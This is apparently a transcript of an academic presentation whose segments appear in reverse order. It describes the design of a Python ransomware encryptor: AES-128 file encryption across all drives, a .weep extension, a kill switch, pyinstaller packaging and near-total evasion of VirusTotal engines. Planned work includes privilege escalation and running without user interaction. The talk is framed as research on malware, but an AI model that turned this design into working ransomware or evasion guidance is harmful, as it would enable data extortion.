In the near future, researchers aim to do 3 more thing first is to leverage DLL to increase memory efficiency which can make the encryption program become faster and stealthier. Second researchers will try other symmetric key encryption and compare their efficiency to select the best algorithm for encryption and decryption last researcher will develop other part of ransomware such as the privilege escalation part, make it run automatically without the need of user interaction.
Conclusions.
This encryption program was not detected by most anti-virus but it is slow. Encrypting all files in the computer at administrator and user privilege does not damage crucial Windows file but for ransomware, it should encrypt only important file extensions or encrypt based on user¡¯s directory for more speed.
This is the plotted result of the encryption speed and decryption speed of different file size under 1GB start from 102.4 MB scaling up linearly to 1024 MB you will see that encryption speed is slower and is degraded faster than of decryption speed.
However researchers also generate 1.00 GB all zeroes files and compare speed of encryption and decryption this is how researchers had generate 1 GB all-zeros file. And this is the result.
Next, about the speed. Speed of encryption program is 2.873 MB/s and decryption program is 24.57 MB/s but the total file size processed by decryption program is bigger because the original file will be expanded during encryption around 33% because it uses base 64 encoding as a part of an encryption program.
These 2 screenshots from target computer show that during encryption program the encryption program uses very high resources from target computer rendered target computer slow. In other words if this is the real ransomware victim will know that there¡¯s something wrong with their computer(s).
Encryption and decryption programs are detected only 2 out of 72 antivirus engines as malicious. The engines that detect both programs as malicious are Secure age apex and Cynet.
After convert from python file to .exe file researchers upload .exe files. Researchers upload .exe files of encryption and decryption program to VirusTotal. Virustotal is an online platform to analyze the virus. Any file uploaded to VirusTotal will be scanned with more than 70 anti virus engines. The results of both encryption and decryption are the same.
Next we run an encryption program on the target computer. This is the specification of the target computer. While encryption and decryption program was running the windows defender and window firewall were active.
After finished writing code. The program is converted to .exe file so it can be run on any windows OS without the prior need to install python interpreter in the machine.
Decryption process is more simple than encryption process it just check if the file has .weep extension or not if any file is of .weep extension this program will decrypt that file. After decryption process is done. The program will delete .weep extension from that file. Make the file usable again.
Next researcher will explain encryption and decryption program in flowchart.
Encryption program starts from do Emergency break function. It is run single time make sure the computer running encryption program is not the researcher¡¯s by compare the hash of researcher¡¯s computer name with predefined hash value because researchers don¡¯t want their computers to be encrypted. Next find main drive with echo %Systemroot% command. Next generate drives list the name of windows drives can be only a-z letter only so this program list it out and do encryption for all drives except maindrive. Next the program then recursively encrypt all file in file list generated by os.walk command but only encrypt files that smaller than 1 GB in size for more speed. After the encryption process is finished the program will append .weep as a encrypted file extension this helps decryption know which file was encrypted and need to be decrypted. After encrypt all file in every drives except maindrive the program then encrypt main drive but not /Windows folder and the processes in green rectangle are repeated.
From the question how to encrypt without damaging Windows OS itself. Researchers choose to omit main drive/Windows because it is where critical files for windows OS reside.
This slide will talk about encryption and decryption program design. Researchers developed this encryption and decryption program by using python 3.9. The 3 main part of the design are first cryptography version 3.3.1 library. In this library researchers use AES-128 as an algorithm for encryption and decryption because it is considered fast and secure encryption algorithm. second is os.walk() command researchers use this command to list all file path in target computer to encrypt and decrypt it. Last is the python library called pyinstaller. Researchers use pyinstaller to convert python file to .exe file.
Next, is about how researchers planned an experiment. First researchers wrote and decryption and decryption program. Second tested encryption program and decryption program against antivirus by using VirusTotal Service. Next researchers run an encryption and decryption programs on target computer last researchers observe its behavior and collect the experiment results.
First let me talk about the research background. Researchers want to know how malwares are created from the malware author¡¯s view therefore, researchers research papers about malware analysis and decided to attempt to develop malware. Starting with malware¡¯s encryption and decryption part.
I have divided this presentation into 7 parts as follows. First is research background. Second is experiment method. Third is encryption and decryption program. Fourth is target computer. Fifth is the experimental result. Sixth is the conclusion. And finally is future works.
Hi everybody, my name is Chawalit Benjangkaprasert from King Mongkut¡¯s Institute of Technology Ladkrabang, THALAND. My presentation topic for today is Malware developing guide : encryption and Decryption.
Click!!
